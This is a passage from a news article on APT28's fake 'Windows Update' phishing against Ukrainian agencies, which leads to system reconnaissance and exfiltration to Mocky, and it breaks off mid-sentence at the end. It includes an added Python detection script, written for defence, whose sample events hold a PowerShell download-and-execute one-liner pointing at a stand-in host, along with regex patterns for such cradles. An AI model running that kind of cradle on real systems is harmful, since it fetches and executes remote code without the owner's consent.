The Kremlin-backed threat group APT28 is flooding Ukrainian government agencies with email messages about bogus Windows updates in the hope of dropping malware that will exfiltrate system data.
According to the Computer Emergency Response Team of Ukraine (CERT-UA), the advanced persistent threat (APT) group – which also is known as Fancy Bear, Strontium, and Sofacy, among other names – sent emails throughout April with “Windows Update” in the subject line. The messages appeared to have been sent by system administrators of government agencies.
“E-mail addresses of senders created on the public service ‘@outlook.com’ can be formed using the employee’s real surname and initials,” CERT-UA wrote in a brief online note.
Within the messages are instructions written in Ukrainian to update the Microsoft OS “against hacker attacks” and illustrations showing how to launch a command line and execute a PowerShell command.
Executing the command simulates a Windows update but actually downloads and executes a PowerShell script that collects basic system information using built-in commands such as “tasklist” and “systeminfo”. The collected information is then sent via an HTTP request to Mocky, a service that mocks APIs to help developers test apps, so the exfiltration traffic blends in with ordinary web requests to a legitimate developer service.
CERT-UA has advised government agencies to restrict users from running PowerShell and to monitor network connections to Mocky.
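As an added illustration, not part of the CERT-UA note or this article, the following Python script shows how a defender could turn the advice above into detection logic: flagging PowerShell download-and-execute one-liners, recon tools such as tasklist and systeminfo spawned by PowerShell, and outbound connections to Mocky, then correlating the three per host. The simplified event shape, hostnames, usernames, the example URL, the generic download cradle (the actual APT28 command is not published here) and the assumption that Mocky endpoints live under mocky.io are all constructed for this example.

```python
import re

# Constructed sample telemetry in a simplified Sysmon-like shape. Hosts, users,
# command lines and the URL are hypothetical; the download cradle is a generic
# illustrative pattern, not the command from the CERT-UA report.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"event": "process_create", "host": "ws-17", "user": r"CORP\oksana.k",
     "image": PS_IMAGE, "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('https://example.invalid/update.ps1')\""},
    {"event": "process_create", "host": "ws-17", "user": r"CORP\oksana.k",
     "image": r"C:\Windows\System32\systeminfo.exe", "parent_image": PS_IMAGE,
     "cmdline": "systeminfo"},
    {"event": "process_create", "host": "ws-17", "user": r"CORP\oksana.k",
     "image": r"C:\Windows\System32\tasklist.exe", "parent_image": PS_IMAGE,
     "cmdline": "tasklist"},
    {"event": "network_connect", "host": "ws-17", "user": r"CORP\oksana.k",
     "image": PS_IMAGE, "dest_host": "run.mocky.io", "dest_port": 443},
    # Benign activity that must not fire: an admin's interactive cmdlet, a
    # browser talking to a Microsoft host, and tasklist launched from cmd.exe.
    {"event": "process_create", "host": "srv-01", "user": r"CORP\admin.svc",
     "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -NoProfile Get-Service"},
    {"event": "network_connect", "host": "srv-01", "user": r"CORP\admin.svc",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dest_host": "update.microsoft.com", "dest_port": 443},
    {"event": "process_create", "host": "ws-22", "user": r"CORP\ivan.p",
     "image": r"C:\Windows\System32\tasklist.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "cmdline": "tasklist"},
]

# Assumption: Mocky serves its mock endpoints under mocky.io (e.g. run.mocky.io).
MOCKY_DOMAIN = "mocky.io"
# Download-and-execute primitives commonly seen in PowerShell one-liners.
CRADLE_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
    r"Invoke-Expression|\bIEX\b|-EncodedCommand|\s-e(nc|c)?\s",
    re.IGNORECASE,
)
# Host-recon tools the report says the script runs.
RECON_TOOLS = {"tasklist.exe", "systeminfo.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _is_powershell(path):
    return _basename(path) in {"powershell.exe", "pwsh.exe"}


def detect(events):
    """Run three rules over an event stream and return one finding per match."""
    findings = []
    for ev in events:
        if ev["event"] == "network_connect":
            host = ev.get("dest_host", "").lower()
            if host == MOCKY_DOMAIN or host.endswith("." + MOCKY_DOMAIN):
                findings.append({"rule": "mocky-connection", "host": ev["host"],
                                 "user": ev["user"],
                                 "detail": f"{_basename(ev['image'])} -> {host}:{ev['dest_port']}"})
        elif ev["event"] == "process_create":
            if _is_powershell(ev["image"]) and CRADLE_RE.search(ev["cmdline"]):
                findings.append({"rule": "powershell-download-cradle", "host": ev["host"],
                                 "user": ev["user"], "detail": ev["cmdline"]})
            if _is_powershell(ev["parent_image"]) and _basename(ev["image"]) in RECON_TOOLS:
                findings.append({"rule": "powershell-spawned-recon", "host": ev["host"],
                                 "user": ev["user"], "detail": ev["cmdline"]})
    return findings


def hosts_matching_chain(findings):
    """Hosts where the whole chain fired: cradle, PowerShell-spawned recon, Mocky beacon."""
    wanted = {"powershell-download-cradle", "powershell-spawned-recon", "mocky-connection"}
    seen = {}
    for f in findings:
        seen.setdefault(f["host"], set()).add(f["rule"])
    return sorted(h for h, rules in seen.items() if wanted <= rules)


if __name__ == "__main__":
    results = detect(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['detail']}")
    print("full chain observed on:", hosts_matching_chain(results))
```

Each rule on its own is noisy (admins do spawn tasklist from PowerShell), which is why the script also reports hosts where all three fired; in production the same idea would be expressed as a correlation rule in the SIEM, with the Mocky domain match applied to proxy and DNS logs as well as endpoint telemetry.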
The notorious APT28 group has been active since 2008. The US Cybersecurity and Infrastructure Security Agency (CISA) and security vendors such as Secureworks and Google-owned Mandiant link it to Russia’s GRU military intelligence agency.
Fancy Bear has in the